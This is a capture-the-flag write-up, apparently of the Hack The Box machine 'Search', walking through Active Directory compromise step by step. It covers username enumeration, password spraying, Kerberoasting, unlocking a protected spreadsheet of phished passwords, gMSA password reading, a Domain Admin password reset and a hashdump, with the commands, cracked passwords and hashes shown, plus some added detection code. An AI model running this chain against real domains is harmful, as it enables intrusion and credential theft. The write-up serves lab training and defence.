Basic information

Port scan

Domain environment:

$ nmap -sC -sV 10.10.11.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-24 14:47 CST
Nmap scan report for 10.10.11.129
Host is up (0.21s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-24 06:49:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-01-24T06:51:10+00:00; 0s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2022-01-24T06:51:10+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
| tls-alpn:
|_ http/1.1
|_http-title: Search — Just Testing IIS
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-01-24T06:51:10+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-01-24T06:51:10+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-01-24T06:51:10+00:00; 0s from scanner time.
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2022-01-24T06:50:34
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.79 seconds

80

The About Us page lists a few usernames that can be turned into a wordlist:

One of the images carries a hint:

send password to xxx
IsolationIsKey?

users.txt

Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
Keely.Lyons
Dax.Santiago
Sierra.Frye
Kyla.Stewart
Kaiara.Spencer
Dave.Simpson
Ben.Thompson
Chris.Stewar

Enum

userenum

Enumerate valid usernames against the wordlist:

./kerbrute_linux_amd64 userenum users.txt -d search.htb --dc 10.10.11.129

2022/01/20 10:47:33 > [+] VALID USERNAME: Keely.Lyons@search.htb
2022/01/20 10:47:33 > [+] VALID USERNAME: Dax.Santiago@search.htb
2022/01/20 10:47:33 > [+] VALID USERNAME: Sierra.Frye@search.htb

smb

Note the hint image above: the recipient named there is also a valid username and has to be added to the wordlist. With that, the SMB shares can be listed:

crackmapexec smb 10.10.11.129 -u users.txt -p 'IsolationIsKey?' --shares

SMB 10.10.11.129 445 RESEARCH [+] search.htb\Hope.Sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [+] Enumerated shares
SMB 10.10.11.129 445 RESEARCH Share Permissions Remark
SMB 10.10.11.129 445 RESEARCH ----- ----------- ------
SMB 10.10.11.129 445 RESEARCH ADMIN$ Remote Admin
SMB 10.10.11.129 445 RESEARCH C$ Default share
SMB 10.10.11.129 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB 10.10.11.129 445 RESEARCH helpdesk
SMB 10.10.11.129 445 RESEARCH IPC$ READ Remote IPC
SMB 10.10.11.129 445 RESEARCH NETLOGON READ Logon server share
SMB 10.10.11.129 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB 10.10.11.129 445 RESEARCH SYSVOL READ Logon server share

ldap

Collect information over LDAP with BloodHound; the hosts file needs an entry first:

10.10.11.129 research.search.htb search.htb

bloodhound-python -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All

users

Generate a new username wordlist from the information gathered so far:

impacket-samrdump search.htb/Hope.Sharp:IsolationIsKey?@10.10.11.129

Administrator
Guest
krbtgt
Santino.Benjamin
Payton.Harmon
Trace.Ryan
Reginald.Morton
Eddie.Stevens
Cortez.Hickman
Chace.Oneill
Abril.Suarez
Savanah.Velazquez
Antony.Russo
Cameron.Melendez
Edith.Walls
Lane.Wu
Arielle.Schultz
Bobby.Wolf
Blaine.Zavala
Margaret.Robinson
Celia.Moreno
Kaitlynn.Lee
Kyler.Arias
Saniyah.Roy
Sarai.Boone
Jermaine.Franco
Alfred.Chan
Jamar.Holt
Sandra.Wolfe
Rene.Larson
Yareli.Mcintyre
Griffin.Maddox
Prince.Hobbs
Armando.Nash
Sonia.Schneider
Maeve.Mann
Lizeth.Love
Amare.Serrano
Savanah.Knox
Frederick.Cuevas
Marshall.Skinner
Edgar.Jacobs
Elisha.Watts
Belen.Compton
Amari.Mora
Cadence.Conner
Katelynn.Costa
Sage.Henson
Maren.Guzman
Natasha.Mayer
Chanel.Bell
Scarlett.Parks
Eliezer.Jordan
Dax.Santiago
Lillie.Saunders
Jayla.Roberts
Lorelei.Huang
Taniya.Hardy
Charlee.Wilkinson
Monique.Moreno
Desmond.Bonilla
Claudia.Sharp
Abbigail.Turner
Yaritza.Riddle
Tori.Mora
Hugo.Forbes
Jolie.Lee
German.Rice
Zain.Hopkins
Hope.Sharp
Kylee.Davila
Melanie.Santiago
Hunter.Kirby
Annabelle.Wells
Ada.Gillespie
Gunnar.Callahan
Aarav.Fry
Colby.Russell
Eve.Galvan
Jeramiah.Fritz
Cade.Austin
Keely.Lyons
Abby.Gonzalez
Joy.Costa
Vincent.Sutton
Cesar.Yang
Camren.Luna
Tyshawn.Peck
Keith.Hester
Braeden.Rasmussen
Angel.Atkinson
Sierra.Frye
Maci.Graves
Judah.Frye
Tristen.Christian
Crystal.Greer
Kayley.Ferguson
Haven.Summers
Isabela.Estrada
Kaylin.Bird
Angie.Duffy
Claudia.Pugh
Jordan.Gregory
web_svc
Tristan.Davies

Kerberoast

BloodHound shows two Kerberoastable accounts. One of them, web_svc, is a temporary service account, and accounts of that kind are commonly vulnerable:

GetUserSPNs

The GetUserSPNs script bundled with impacket retrieves the hash directly:

impacket-GetUserSPNs -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey?
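From the defender's side, here is an added example (not part of the original writeup) of what the request above looks like in Windows Security event 4769 on the domain controller: a successful RC4 (0x17) service ticket for a user-account SPN such as web_svc, rather than for a computer account or krbtgt. The event records below are constructed sample data; the second service name and the client addresses are placeholders.

```python
from collections import defaultdict

# RC4-HMAC / RC4-HMAC-EXP; domain-joined Windows clients normally negotiate AES (0x11 / 0x12)
RC4_ETYPES = {"0x17", "0x18"}

# Constructed sample of event 4769 (A Kerberos service ticket was requested) fields.
# Not real logs from the box: the second service name and the client addresses are placeholders.
SAMPLE_4769 = [
    {"account": "Hope.Sharp@SEARCH.HTB", "service": "web_svc", "enc": "0x17",
     "status": "0x0", "ip": "::ffff:192.0.2.10"},
    {"account": "Hope.Sharp@SEARCH.HTB", "service": "svc_placeholder", "enc": "0x17",
     "status": "0x0", "ip": "::ffff:192.0.2.10"},
    # ordinary traffic: AES ticket for a computer account, a krbtgt ticket, and a failed RC4 request
    {"account": "Sierra.Frye@SEARCH.HTB", "service": "RESEARCH$", "enc": "0x12",
     "status": "0x0", "ip": "::ffff:192.0.2.20"},
    {"account": "Sierra.Frye@SEARCH.HTB", "service": "krbtgt", "enc": "0x17",
     "status": "0x0", "ip": "::ffff:192.0.2.20"},
    {"account": "Edgar.Jacobs@SEARCH.HTB", "service": "web_svc", "enc": "0x17",
     "status": "0xe", "ip": "::ffff:192.0.2.30"},  # KDC_ERR_ETYPE_NOSUPP: RC4 refused
]

def kerberoast_candidates(events):
    """Return {requesting account: sorted service accounts} for 4769 events that look like
    Kerberoasting: a successful RC4 service ticket for a user (non-$) SPN other than krbtgt.
    One such ticket is what GetUserSPNs -request obtains for each SPN it finds."""
    hits = defaultdict(set)
    for e in events:
        if e["status"] != "0x0" or e["enc"].lower() not in RC4_ETYPES:
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        hits[e["account"]].add(svc)
    return {acct: sorted(svcs) for acct, svcs in hits.items()}

def sweep_suspects(events, min_services=2):
    """Accounts that pulled RC4 tickets for several distinct service accounts: a single user
    rarely needs that many, while a roasting sweep requests one ticket per SPN it finds."""
    return sorted(a for a, s in kerberoast_candidates(events).items() if len(s) >= min_services)
```

The 4769 event is only written when "Audit Kerberos Service Ticket Operations" is enabled on the DC. Service accounts that still only support RC4 will trip this rule on legitimate use, so baseline per service before alerting.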

hashcrack

The cracked password:

@3ONEmillionbaby

Enum

Continue enumerating with the recovered password; another user reuses it:

crackmapexec smb 10.10.11.129 -u users3.txt -p '@3ONEmillionbaby' --continue-on-success

SMB 10.10.11.129 445 RESEARCH [+] search.htb\Edgar.Jacobs:@3ONEmillionbaby

smb

Browse the SMB share with this account; there is an xlsx file:

smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs

cd edgar.jacobs\Desktop\
get Phishing_Attempt.xlsx

There is a hidden column: column C is not displayed:

xlsx

An xlsx file is just a zip archive, so it can be unzipped directly and the sheetProtection element removed:

unzip Phishing_Attempt.xlsx

xl/worksheets/sheet2.xml

<sheetProtection algorithmName="SHA-512" hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg==" saltValue="U9oZfaVCkz5jWdhs9AA8nA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

zip -r Phishing.xlsx .
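As an added example (not from the original writeup), a small Python audit that shows why this works: sheetProtection and column hiding are plain attributes in the worksheet XML, so anything in a hidden column of a "protected" sheet is readable without the password. The workbook, cell values and hash/salt below are constructed placeholders, not the real Phishing_Attempt.xlsx.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {"s": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

def build_sample_xlsx() -> bytes:
    """Constructed stand-in for Phishing_Attempt.xlsx: one protected sheet, column C hidden (placeholder hash/salt)."""
    sheet = (
        '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        '<sheetProtection algorithmName="SHA-512" hashValue="PLACEHOLDER" saltValue="PLACEHOLDER" spinCount="100000" sheet="1"/>'
        '<cols><col min="3" max="3" width="0" hidden="1"/></cols>'
        '<sheetData><row r="2">'
        '<c r="A2" t="inlineStr"><is><t>some.user</t></is></c>'
        '<c r="C2" t="inlineStr"><is><t>constructed-secret</t></is></c>'
        '</row></sheetData></worksheet>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()

def col_index(letters: str) -> int:
    """Column letters to 1-based index: A -> 1, C -> 3, AA -> 27."""
    n = 0
    for ch in letters:
        n = n * 26 + ord(ch.upper()) - ord("A") + 1
    return n

def audit_workbook(data: bytes) -> dict:
    """Per worksheet: is sheetProtection set, which columns are hidden, and what the cells in
    those columns hold. Both are plain XML attributes, so nothing here needs the sheet password.
    Handles inline strings and numbers; shared-string cells (t="s") would need xl/sharedStrings.xml."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.startswith("xl/worksheets/sheet"):
                continue
            root = ET.fromstring(z.read(name))
            hidden = set()
            for col in root.iterfind("s:cols/s:col", NS):
                if col.get("hidden") == "1":
                    hidden.update(range(int(col.get("min")), int(col.get("max")) + 1))
            cells = [(c.get("r"), c.findtext("s:is/s:t", namespaces=NS) or c.findtext("s:v", namespaces=NS))
                     for c in root.iterfind("s:sheetData/s:row/s:c", NS)
                     if col_index("".join(ch for ch in c.get("r") if ch.isalpha())) in hidden]
            report[name] = {"protected": root.find("s:sheetProtection", NS) is not None,
                            "hidden_cols": sorted(hidden), "hidden_cells": cells}
    return report
```

Running audit_workbook over a real workbook flags any sheet that relies on protection or hidden columns to conceal data; such files should be treated as plaintext when deciding where they may be stored or shared.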

This yields what appear to be passwords harvested during an internal phishing exercise:

user flag

According to the BloodHound analysis, Sierra.Frye and Abby.Gonzalez lie on an attack path to the domain controller. Using Sierra.Frye's password to access SMB gives user.txt:

smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
cd sierra.frye
cd desktop
get user.txt

certificate

The backup folder in the Downloads directory contains certificate files:

Importing them into the browser prompts for a password:

staff

A simple directory scan shows that staff requires a client certificate:

p12tool

Crack the password (this takes a while):

./p12tool crack -c ../staff.pfx -f ~/Tools/dict/rockyou.txt

misspissy

powershell

Import the certificate and log in with the account credentials to reach the PowerShell console:

GMSA

sierra.frye belongs to the ITSEC group, which has the ReadGMSAPassword right:

$ python3 gMSADumper.py -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
Users or groups who can read password for BIR-ADFS-GMSA$:
> ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

BIR-ADFS-GMSA$

A gMSA password is, in theory, not crackable, so it is reused directly through PowerShell instead:

# Get-ADServiceAccount is from the ActiveDirectory module; ConvertFrom-ADManagedPasswordBlob is from DSInternals
$user = 'BIR-ADFS-GMSA$'
# reading msDS-ManagedPassword only succeeds for principals granted ReadGMSAPassword (here: ITSEC)
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
# decode the MSDS-MANAGEDPASSWORD_BLOB; SecureCurrentPassword is the current password as a SecureString
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user,$mp.SecureCurrentPassword
# run a command as the gMSA to confirm the credential works
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

Domain Admin & root.txt

BIR-ADFS-GMSA has GenericAll over Tristan.Davies, and Tristan.Davies is a Domain Admin:

So Tristan.Davies's password can be changed directly, followed by a login:

Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies miao@1234 /domain}

impacket-wmiexec -dc-ip 10.10.11.129 search.htb/Tristan.Davies@10.10.11.129

hashdump

Load Meterpreter from the existing shell and run hashdump:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd69d23e4383daa5b0f42d29dba9529a:::
...

References